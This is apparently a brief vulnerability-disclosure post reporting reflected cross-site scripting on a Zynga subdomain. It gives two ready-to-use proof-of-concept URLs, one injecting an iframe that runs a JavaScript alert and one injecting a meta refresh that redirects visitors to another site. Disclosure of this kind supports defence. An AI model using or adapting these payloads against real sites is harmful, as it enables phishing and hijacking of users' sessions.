________ .__.__ _______ .____ _____ ___. ________ \_____ \______ _____|__| | \ _ \ ____ | | _____ / \\_ |__ \______ \ _____ _(__ <\____ \/ ___/ | | / /_\ \ / \| | \__ \ / \ / \| __ \ | | \\__ \ / \ |_> >___ \| | |_\ \_/ \ | \ |___ / __ \_/ Y \ \_\ \| ` \/ __ \_ /______ / __/____ >__|____/\_____ /___| /_______ (____ /\____|__ /___ /_______ (____ / \/|__| \/ \/ \/ \/ \/ \/ \/ \/ \/ Zynga.COM Multiple XSS vulnerability vendor: www.zynga.com Author: Karthik R (3psil0nLambDa) Email: Karthik.cupid@gmail.com My blog: www.epsilonlambda.co.cc ------------------------------------------------------------------------------------------------------------------------------------------------------------ * Multiple XSS vulnerability Cross site vulnerability in zynga. Allows iframe injection and URL redirection. 1. Demo iframe injection: http://cn.zynga.com/index.php?t=list&r=us&c=%22%3E%3Ciframe%20src=%22javascript:alert%28%273psil0nlAmBdA%27%29;%22%3E%3C/iframe%3E 2. Demo URL redirection: http://cn.zynga.com/index.php?t=list&r=us&c=%22%3E%3Cmeta%20HTTP-EQUIV=%22REFRESH%22%20content=%220;%20url=http://www.epsilonlambda.wordpress.com%22%3E ------------------------------------------------------------------------------------------------------------------------------------------------------------ Thanks to side-effects and greets to r007ki7 and my love taashu.